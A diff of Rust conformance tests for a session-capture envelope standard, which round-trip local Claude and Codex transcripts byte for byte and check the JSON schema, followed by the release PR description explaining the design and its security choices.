+    // Prefer a small file so the test stays fast.
+    found.sort_by_key(|p| std::fs::metadata(p).map(|m| m.len()).unwrap_or(u64::MAX));
+    found.into_iter().find(|p| {
+        std::fs::metadata(p)
+            .map(|m| m.len() > 0 && m.len() < 5_000_000)
+            .unwrap_or(false)
+    })
+}
+
+/// Whether a string is a canonical 8-4-4-4-12 hex UUID.
+fn is_uuid_like(s: &str) -> bool {
+    let lengths = [8usize, 4, 4, 4, 12];
+    let parts: Vec<&str> = s.split('-').collect();
+    parts.len() == 5
+        && parts
+            .iter()
+            .zip(lengths)
+            .all(|(p, n)| p.len() == n && p.chars().all(|c| c.is_ascii_hexdigit()))
+}
+
+/// Recover the session id from a transcript filename.
+///
+/// Claude names the file for the session id directly. Codex prefixes it with
+/// `rollout-` and the start timestamp, so the id is the trailing UUID. This
+/// mirrors the `path_template` shapes in the reconstitution registry, and it is
+/// exactly the kind of harness detail a Source must get right: taking the whole
+/// stem as the id yields a value the registry correctly rejects.
+fn extract_session_id(stem: &str) -> String {
+    let parts: Vec<&str> = stem.split('-').collect();
+    if parts.len() >= 5 {
+        let tail = &parts[parts.len() - 5..];
+        let candidate = tail.join("-");
+        let lengths = [8usize, 4, 4, 4, 12];
+        let is_uuid = tail
+            .iter()
+            .zip(lengths)
+            .all(|(p, n)| p.len() == n && p.chars().all(|c| c.is_ascii_hexdigit()));
+        if is_uuid {
+            return candidate;
+        }
+    }
+    stem.to_string()
+}
+
+/// Build an in-flight envelope wrapping a transcript file verbatim.
+///
+/// `raw` is the file's exact bytes as a JSON string. This is the representation
+/// that makes byte-exact reconstitution possible; see the
+/// `parsed_raw_does_not_round_trip_byte_exact` test for why parsing to an array
+/// instead would forfeit that.
+fn envelope_for(path: &Path, agent: &str, source_format: &str) -> (SessionEnvelope, String) {
+    let bytes = std::fs::read(path).expect("session file must be readable");
+    let contents = String::from_utf8(bytes).expect("transcript must be UTF-8");
+    let stem = path
+        .file_stem()
+        .and_then(|s| s.to_str())
+        .expect("session file must have a stem");
+    let session_id = extract_session_id(stem);
+
+    let envelope = SessionEnvelope {
+        scs_version: SCS_VERSION.to_string(),
+        origin: session_capture::Origin {
+            host: "local-conformance-harness".to_string(),
+            environment: "local".to_string(),
+        },
+        agent: agent.to_string(),
+        source_format: source_format.to_string(),
+        session_id,
+        parent_session_id: None,
+        started_at: "2026-08-06T00:00:00Z".to_string(),
+        last_activity_at: "2026-08-06T01:00:00Z".to_string(),
+        // In flight: the store computes this (section 4.2.3).
+        content_hash: None,
+        metadata: None,
+        raw: serde_json::Value::String(contents.clone()),
+    };
+    (envelope, contents)
+}
+
+fn assert_schema_valid(envelope: &SessionEnvelope) {
+    let schema = session_envelope_schema();
+    let validator = jsonschema::validator_for(&schema).expect("schema compiles");
+    let instance = serde_json::to_value(envelope).expect("envelope serializes");
+    if let Err(error) = validator.validate(&instance) {
+        panic!("real-session envelope must satisfy the shipped schema: {error}");
+    }
+}
+
+/// The producer round trip for one harness: wrap a real transcript, validate it,
+/// resolve the target through `metadata.source_path` and the containment check,
+/// write `raw` back at that relocated path, and compare bytes.
+///
+/// Panics rather than returning when no transcript is available. These tests are
+/// `#[ignore]`d precisely so that running them is a deliberate act; a silent pass
+/// on an empty machine would report success while proving nothing.
+fn round_trip(agent: &str, source_format: &str, sessions_root: PathBuf, extension: &str) {
+    assert!(
+        sessions_root.exists(),
+        "{agent}: {} does not exist. These tests assert against real transcripts; \
+         run them on a machine that has used this harness.",
+        sessions_root.display()
+    );
+    let session_path = find_one_session(&sessions_root, extension).unwrap_or_else(|| {
+        panic!(
+            "{agent}: no {extension} session transcripts under {}. \
+             Nothing to round trip, so this is a failure rather than a pass.",
+            sessions_root.display()
+        )
+    });
+    eprintln!("{agent}: using real transcript {}", session_path.display());
+
+    // 1. Capture into an envelope, and validate it as an in-flight envelope.
+    let (envelope, original) = envelope_for(&session_path, agent, source_format);
+    envelope
+        .validate()
+        .expect("in-flight envelope must validate");
+    assert!(
+        envelope.idempotency_key().is_none(),
+        "an in-flight envelope has no store-computed hash yet"
+    );
+    assert_schema_valid(&envelope);
+
+    // 2. Resolve restore knowledge from the registry, exactly as a Reconstitutor
+    //    would, including the untrusted-input validation.
+    let registry = Registry::shipped();
+    let entry = registry
+        .entry(source_format)
+        .expect("registry must know this source_format");
+    entry
+        .validate_session_id(&envelope.session_id)
+        .expect("a real session id must pass the registry's shape check");
+    assert_eq!(entry.harness, agent);
+
+    // 3. Reconstitute onto a DIFFERENT root, which is the cross-machine case:
+    //    the harness root differs, so the target must be recomputed rather than
+    //    reusing the captured absolute path (section 6.4.3).
+    let target_root = std::env::temp_dir().join(format!("apss-scs-roundtrip-{source_format}"));
+    let _ = std::fs::remove_dir_all(&target_root);
+    std::fs::create_dir_all(&target_root).expect("temp target root");
+
+    // The relative path under the harness root, exactly what `source_path`
+    // carries. Deriving it here proves the value the example ships is the value
+    // a Source would actually record.
+    let relative = session_path
+        .strip_prefix(&sessions_root)
+        .expect("the transcript lives under the harness root")
+        .to_string_lossy()
+        .replace('\\', "/");
+
+    // Resolve it the way a Reconstitutor must: through the containment check,
+    // against the new root. This is the step that would reject a hostile
+    // source_path, and it is what relocates the file.
+    let target = resolve_within_root(&target_root, &relative)
+        .expect("a real relative transcript path must resolve inside the new root");
+    // Compare against the CANONICAL root: resolve_within_root canonicalizes, and
+    // on macOS /tmp is itself a symlink to /private/tmp, so the uncanonicalized
+    // path is not a prefix of the resolved one.
+    let canonical_root = target_root
+        .canonicalize()
+        .expect("the new harness root exists");
+    assert!(
+        target.starts_with(&canonical_root),
+        "the relocated target must sit under the new harness root: {} not under {}",
+        target.display(),
+        canonical_root.display()
+    );
+    assert_ne!(
+        target, session_path,
+        "reconstitution must write to the relocated path, not the captured one"
+    );
+    if let Some(parent) = target.parent() {
+        std::fs::create_dir_all(parent).expect("create relocated parent dirs");
+    }
+
+    let restored = envelope
+        .raw
+        .as_str()
+        .expect("raw was captured as a verbatim string");
+    std::fs::write(&target, restored).expect("reconstitution write");
+
+    let written = std::fs::read(&target).expect("read back");
+    let source = std::fs::read(&session_path).expect("read original");
+    assert_eq!(
+        written, source,
+        "{agent}: reconstitute(capture(session)) must equal session byte for byte"
+    );
+    assert_eq!(restored, original);
+    eprintln!(
+        "{agent}: round trip OK, {} bytes byte-identical",
+        source.len()
+    );
+
+    let _ = std::fs::remove_dir_all(&target_root);
+}
+
+#[test]
+#[ignore = "requires a populated ~/.claude on this machine"]
+fn claude_producer_round_trip_is_byte_exact() {
+    round_trip(
+        "ClaudeCode",
+        "claude-jsonl-v1",
+        home().join(".claude/projects"),
+        "jsonl",
+    );
+}
+
+#[test]
+#[ignore = "requires a populated ~/.codex on this machine"]
+fn codex_producer_round_trip_is_byte_exact() {
+    round_trip(
+        "Codex",
+        "codex-turns-v1",
+        home().join(".codex/sessions"),
+        "jsonl",
+    );
+}
+
+/// The registry's Claude slug rule must reproduce the directory names actually
+/// present on this machine. This is what catches the registry going stale.
+#[test]
+#[ignore = "requires a populated ~/.claude on this machine"]
+fn claude_slug_rule_reproduces_real_directory_names() {
+    let projects = home().join(".claude/projects");
+    if !projects.exists() {
+        eprintln!("SKIP: {} does not exist", projects.display());
+        return;
+    }
+    let registry = Registry::shipped();
+    let entry = registry.entry("claude-jsonl-v1").unwrap();
+
+    // Claude's slug is derived from an absolute cwd. Round-trip the derivation
+    // against real directory names that correspond to paths still on disk.
+    let mut checked = 0;
+    for dir in std::fs::read_dir(&projects).unwrap().flatten() {
+        let name = dir.file_name().to_string_lossy().to_string();
+        if !name.starts_with('-') {
+            continue;
+        }
+        // Reconstruct a plausible cwd and confirm the rule maps it back.
+        let candidate = name.replacen('-', "/", 1).replace('-', "/");
+        if !Path::new(&candidate).exists() {
+            continue; // hyphenated or dotted names are not uniquely invertible
+        }
+        let derived = entry
+            .slug_rule
+            .slug_for(&candidate)
+            .expect("claude derives a cwd slug");
+        assert_eq!(
+            derived, name,
+            "registry slug rule must reproduce the real directory name"
+        );
+        checked += 1;
+        if checked >= 5 {
+            break;
+        }
+    }
+    eprintln!("verified slug rule against {checked} real project directories");
+    assert!(checked > 0, "expected at least one verifiable project dir");
+}
+
+/// Why `raw` must be captured as a verbatim string rather than a parsed array.
+///
+/// This is a conformance trap worth having a test for: a Source that parses a
+/// JSONL transcript into an array of JSON objects and stores that has silently
+/// forfeited byte-exact reconstitution, because re-serializing does not
+/// reproduce the original formatting.
+#[test]
+#[ignore = "requires a populated ~/.claude on this machine"]
+fn parsed_raw_does_not_round_trip_byte_exact() {
+    let projects = home().join(".claude/projects");
+    let Some(session_path) = find_one_session(&projects, "jsonl") else {
+        eprintln!("SKIP: no Claude transcripts available");
+        return;
+    };
+    let original = std::fs::read_to_string(&session_path).unwrap();
+
+    // Parse each line, then re-serialize, the way a normalizing Source would.
+    let reparsed: Vec<serde_json::Value> = original
+        .lines()
+        .filter(|l| !l.trim().is_empty())
+        .map(|l| serde_json::from_str(l).expect("each line is JSON"))
+        .collect();
+    let reserialized = reparsed
+        .iter()
+        .map(|v| serde_json::to_string(v).unwrap())
+        .collect::<Vec<_>>()
+        .join("\n");
+
+    assert_ne!(
+        reserialized, original,
+        "if this ever passes, the trap is not real for this file; \
+         verbatim-string capture is still the conformant choice"
+    );
+    eprintln!(
+        "confirmed: parse-then-reserialize diverges ({} vs {} bytes), \
+         so a normalizing Source cannot satisfy section 6.4.4",
+        reserialized.len(),
+        original.len()
+    );
+}

--- a/standards/v1/APS-V1-0004-session-capture/tests/schema_conformance_test.rs
+++ b/standards/v1/APS-V1-0004-session-capture/tests/schema_conformance_test.rs
@@ -1,0 +1,147 @@
+//! Conformance tests: the shipped examples validate against the shipped JSON
+//! Schema, and the schema stays in step with the Rust types.
+//!
+//! These are the tests that make APS-V1-0004 executable rather than aspirational
+//! (spec section 1.3). A consumer that depends on this crate inherits them.
+
+use session_capture::{SessionEnvelope, session_envelope_schema};
+
+const SOURCE_EXAMPLE: &str = include_str!("../examples/claude-source-envelope.json");
+const BATCH_EXAMPLE: &str = include_str!("../examples/workflow-exporter-batch.json");
+
+fn compiled_schema() -> jsonschema::Validator {
+    let schema = session_envelope_schema();
+    jsonschema::validator_for(&schema).expect("the shipped schema must compile")
+}
+
+fn assert_schema_valid(validator: &jsonschema::Validator, instance: &serde_json::Value) {
+    if let Err(error) = validator.validate(instance) {
+        panic!("instance must satisfy the session-envelope schema: {error}");
+    }
+}
+
+#[test]
+fn embedded_schema_is_valid_and_compiles() {
+    let schema = session_envelope_schema();
+    assert_eq!(
+        schema["$id"], "urn:apss:schema:aps-v1-0004:session-envelope:1.0.0",
+        "schema $id must carry the ratified standard id"
+    );
+    let _ = compiled_schema();
+}
+
+#[test]
+fn source_example_satisfies_the_schema() {
+    let validator = compiled_schema();
+    let instance: serde_json::Value = serde_json::from_str(SOURCE_EXAMPLE).unwrap();
+    assert_schema_valid(&validator, &instance);
+}
+
+#[test]
+fn every_batch_envelope_satisfies_the_schema() {
+    let validator = compiled_schema();
+    let body: serde_json::Value = serde_json::from_str(BATCH_EXAMPLE).unwrap();
+    let envelopes = body["envelopes"]
+        .as_array()
+        .expect("batch carries envelopes");
+    for envelope in envelopes {
+        assert_schema_valid(&validator, envelope);
+    }
+}
+
+/// The schema and the Rust `validate()` must agree on what is conformant.
+/// If they drift, one of them is lying to consumers.
+#[test]
+fn schema_and_rust_validation_agree_on_scs_version() {
+    let validator = compiled_schema();
+    let mut instance: serde_json::Value = serde_json::from_str(SOURCE_EXAMPLE).unwrap();
+
+    // The real-world drift: `scs/1` instead of `1.0`. Both layers must reject it.
+    instance["scs_version"] = serde_json::json!("scs/1");
+    assert!(
+        validator.validate(&instance).is_err(),
+        "schema must reject a prefixed scs_version"
+    );
+    let envelope: SessionEnvelope = serde_json::from_value(instance.clone()).unwrap();
+    assert!(
+        envelope.validate().is_err(),
+        "Rust validation must reject a prefixed scs_version"
+    );
+
+    // And both must accept the canonical form.
+    instance["scs_version"] = serde_json::json!("1.0");
+    assert_schema_valid(&validator, &instance);
+    let envelope: SessionEnvelope = serde_json::from_value(instance).unwrap();
+    envelope
+        .validate()
+        .expect("canonical scs_version is conformant");
+}
+
+/// Every field the schema marks required must be non-optional in practice:
+/// dropping any one of them must fail schema validation.
+#[test]
+fn every_required_field_is_actually_enforced() {
+    // The expected set is written out here rather than read from the schema.
+    // Deriving it from `schema["required"]` would test the schema against
+    // itself: deleting `started_at` from the schema would silently delete the
+    // check for `started_at` too, and the test would still pass.
+    const REQUIRED: [&str; 8] = [
+        "scs_version",
+        "origin",
+        "agent",
+        "source_format",
+        "session_id",
+        "started_at",
+        "last_activity_at",
+        "raw",
+    ];
+    // `content_hash` is deliberately NOT here: it is absent in flight and
+    // populated by the store (spec 4.2.3).
+    const NOT_REQUIRED: [&str; 3] = ["content_hash", "metadata", "parent_session_id"];
+
+    let validator = compiled_schema();
+    let schema = session_envelope_schema();
+    let declared: Vec<&str> = schema["required"]
+        .as_array()
+        .expect("schema declares required fields")
+        .iter()
+        .map(|v| v.as_str().unwrap())
+        .collect();
+    assert_eq!(
+        declared, REQUIRED,
+        "the schema's required list changed; update this test deliberately, \
+         because it is a wire-compatibility change"
+    );
+
+    for field in REQUIRED {
+        let mut instance: serde_json::Value = serde_json::from_str(SOURCE_EXAMPLE).unwrap();
+        instance.as_object_mut().unwrap().remove(field);
+        assert!(
+            validator.validate(&instance).is_err(),
+            "schema must reject an envelope missing required field `{field}`"
+        );
+    }
+
+    for field in NOT_REQUIRED {
+        let mut instance: serde_json::Value = serde_json::from_str(SOURCE_EXAMPLE).unwrap();
+        instance.as_object_mut().unwrap().remove(field);
+        assert_schema_valid(&validator, &instance);
+    }
+}
+
+/// Unknown keys must be tolerated so additive evolution cannot break existing
+/// stores (spec section 8.3).
+#[test]
+fn additive_evolution_is_tolerated() {
+    let validator = compiled_schema();
+    let mut instance: serde_json::Value = serde_json::from_str(SOURCE_EXAMPLE).unwrap();
+    instance["a_field_from_a_later_minor"] = serde_json::json!("value");
+    instance["metadata"]["an_unknown_metadata_key"] = serde_json::json!(42);
+    instance["origin"]["an_unknown_origin_key"] = serde_json::json!(true);
+    assert_schema_valid(&validator, &instance);
+
+    let envelope: SessionEnvelope = serde_json::from_value(instance).unwrap();
+    envelope
+        .validate()
+        .expect("unknown keys must not make an envelope non-conformant");
+}


### PR DESCRIPTION
Cuts a release from `main`. The headline is a new official standard,
**APS-V1-0004 Session Capture**, published to crates.io for the first time.

## Changelog

### New standard: APS-V1-0004 Session Capture (1.0.0)

One capture contract so agent sessions from any runtime back up uniformly, stay
searchable, and can be resumed on another machine. Promoted from `EXP-V1-0003`;
the contract is proven by a corpus of roughly 3,000 real sessions captured
across Claude, Codex, and Cursor, which is what qualified it for ratification.

The crate ships the canonical envelope types, their validation, the embedded
JSON Schema, the reconstitution registry, and the `content_hash` implementation.
Consumers depend on it rather than reimplementing the envelope, so divergence
from the standard is a build failure instead of a discrepancy found months
later.

Notable contents:

- **Three conformance profiles**: Source (pull), Exporter (push), and
  Reconstitutor (restore). The third covers same-harness cross-machine resume
  and is the exact inverse of a Source, which turns "preserve `raw` verbatim"
  from an unverifiable MUST into an executable round-trip test.
- **`content_hash` is computed at ingest, before sanitizing**, over
  `{raw, session_format, session_id}` canonicalized per RFC 8785 and hashed with
  SHA-256. Hashing the sanitized form would make the sanitizer ruleset part of
  session identity, so every secret-detection improvement would move the digest
  of content that never changed, with no possible migration once the originals
  are discarded.
- **Non-I-JSON input is rejected rather than coerced.** Integers past 2^53 and
  duplicate object member names would otherwise assign one identity to two
  different sessions, which for a dedup key is silent data loss.
- **Restore knowledge lives in a standard-owned registry**, never in envelope
  fields. Push producers are untrusted, so an envelope-carried resume command
  executed on the restoring machine would be remote code execution by design.
- Two CLI commands, `validate` and `hash`, so a store implementer can check
  envelopes and diff their hash computation against the reference one.

Three adversarial review passes ran against the branch before merge. They found
two design blockers, three security bypasses in the hardening itself, and the
hash collision described above. All are fixed and regression-tested. 65 tests,
including an independently-computed known-answer vector for the hash and an
opt-in harness that round-trips real Claude and Codex transcripts byte-for-byte.

### System crates: 1.4.0 → 1.5.0

`apss-core`, `aps-cli`, and `apss-bootstrap` share the workspace version.
`aps-cli` now depends on `apss-v1-0004-session-capture` and dispatches its
commands, so the CLI gained functionality. No behaviour changed in the existing
standards.

### Documentation

- New runbook: integrating APS-V1-0004 into a backend service, covering the
  ingest ordering that decides conformance, the untrusted-input rules for
  reconstitution, and migrating an existing corpus (#120).
- `CONTRIBUTING.md` synced with the `apss` / `apss-dev` CLI split (#116).

## Expected publish set

Per `release-create.yml`'s tiered publish, this release should tag and publish:

| Crate | Version | Note |
|---|---|---|
| `apss-core` | 1.5.0 | system crate changed |
| `apss-v1-0004-session-capture` | 1.0.0 | **first publish** |
| `apss` (bootstrap) | 1.5.0 | published last |

`APS-V1-0000` and everything under `standards-experimental/` are excluded from
publish by directory prefix, as always: they receive tags and release notes only.

`apss-v1-0004-session-capture` has never been published, so this is the first
automated publish of a previously-nonexistent crate. Worth confirming the
crates.io result rather than assuming the idempotency check covered it.

## Verification

`fmt`, `clippy -D warnings`, `cargo test --workspace`, `v1 validate repo`, and
`v1 validate distribution` all clean on the merged `main`.